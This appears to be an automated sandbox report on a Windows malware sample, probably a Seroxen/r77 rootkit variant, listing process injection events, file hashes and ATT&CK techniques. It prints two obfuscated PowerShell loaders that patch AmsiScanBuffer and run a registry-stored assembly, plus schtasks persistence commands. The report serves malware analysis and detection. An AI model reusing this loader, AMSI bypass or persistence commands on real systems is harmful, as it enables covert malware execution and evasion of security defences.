PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
PID 3548 wrote to memory of 616	3548	dllhost.exe	winlogon.exe
PID 3548 wrote to memory of 676	3548	dllhost.exe	lsass.exe
PID 3548 wrote to memory of 948	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 60	3548	dllhost.exe	dwm.exe
PID 3548 wrote to memory of 512	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 944	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1052	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1088	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1132	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1168	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1260	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1312	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1428	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1440	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1456	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1504	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1512	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1672	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1708	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1764	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1800	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1904	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1160	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1448	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1544	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 1692	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 2092	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 2176	3548	dllhost.exe	spoolsv.exe
PID 3548 wrote to memory of 2248	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 2308	3548	dllhost.exe	svchost.exe
PID 3548 wrote to memory of 2472	3548	dllhost.exe	svchost.exe
PID 676 wrote to memory of 3412	676	lsass.exe	BackgroundTransferHost.exe
PID 676 wrote to memory of 3412	676	lsass.exe	BackgroundTransferHost.exe
PID 3548 wrote to memory of 2480	3548	dllhost.exe	svchost.exe
PID 676 wrote to memory of 3412	676	lsass.exe	BackgroundTransferHost.exe
PID 676 wrote to memory of 3412	676	lsass.exe	BackgroundTransferHost.exe
PID 676 wrote to memory of 3412	676	lsass.exe	BackgroundTransferHost.exe
PID 3548 wrote to memory of 2664	3548	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:60

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e958a193-9963-4c23-9ea2-cf892b129985}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fe4478b9-0051-4074-b630-a9dc39d9cb95}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1168

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mCXkdBosmkrz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQrnzePqSeFjVJ,[Parameter(Position=1)][Type]$itemsMtXpB)$LLbeBYuINnx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$LLbeBYuINnx.DefineConstructor('RTSp'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQrnzePqSeFjVJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$LLbeBYuINnx.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$itemsMtXpB,$jQrnzePqSeFjVJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $LLbeBYuINnx.CreateType();}$qhfxpecUiWpvl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'ste'+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ro'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$ZDzpwzKWMdMfbJ=$qhfxpecUiWpvl.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MOAleEdLausBlxfMMlz=mCXkdBosmkrz @([String])([IntPtr]);$xSmgXuSOZSVHWTKuJvfOLi=mCXkdBosmkrz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cJJXSYshHhV=$qhfxpecUiWpvl.GetMethod('G'+[Char](101)+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DujHIhsutrTluc=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object]('L'+'o'+'a'+[Char](100)+'L'+'i'+''+'b'+''+'r'+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$AYJBwFEEtVlwgGEgo=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$lqgfIcf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DujHIhsutrTluc,$MOAleEdLausBlxfMMlz).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$yEpjVjUFedPqzTNwa=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$lqgfIcf,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$TBSoVryaKg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,4,[ref]$TBSoVryaKg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yEpjVjUFedPqzTNwa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,0x20,[ref]$TBSoVryaKg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VHUlKDHOaaXL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fGdQtsyqVZZYAp,[Parameter(Position=1)][Type]$joTUiHyUGU)$nOrjXkmlbTq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsi'+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nOrjXkmlbTq.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fGdQtsyqVZZYAp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nOrjXkmlbTq.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+''+'u'+'al',$joTUiHyUGU,$fGdQtsyqVZZYAp).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $nOrjXkmlbTq.CreateType();}$sNozhZzIkcwMl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KhXHYMKLDxWdAN=$sNozhZzIkcwMl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QVeotFJywKvrBXvXUQo=VHUlKDHOaaXL @([String])([IntPtr]);$SyYRqsqyiLxfNsUkbPmJig=VHUlKDHOaaXL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BtnfBJpTPbl=$sNozhZzIkcwMl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rnel'+[Char](51)+'2'+'.'+'d'+'l'+''+'l'+'')));$DghpFKiqjocmUY=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$SayvemgIQDQzOnRLO=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$QAjoSlF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DghpFKiqjocmUY,$QVeotFJywKvrBXvXUQo).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vmmOrbSJWRDLUTNVw=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$QAjoSlF,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KMmjuSvLTi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,4,[ref]$KMmjuSvLTi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vmmOrbSJWRDLUTNVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,0x20,[ref]$KMmjuSvLTi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WAR'+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1456

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
- Modifies registry class
PID:2676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2092

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2752

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2932

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3400

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3564

C:\Users\Admin\AppData\Local\Temp\Uni.exe
"C:\Users\Admin\AppData\Local\Temp\Uni.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2968

C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:3928

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:2640

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3688

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3868

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2372

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4376

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2552

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4876

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:1644

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:636

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3412

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4700

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
Filesize
409KB

MD5
7417c8c73e614f293152575f46134216

SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

SHA512
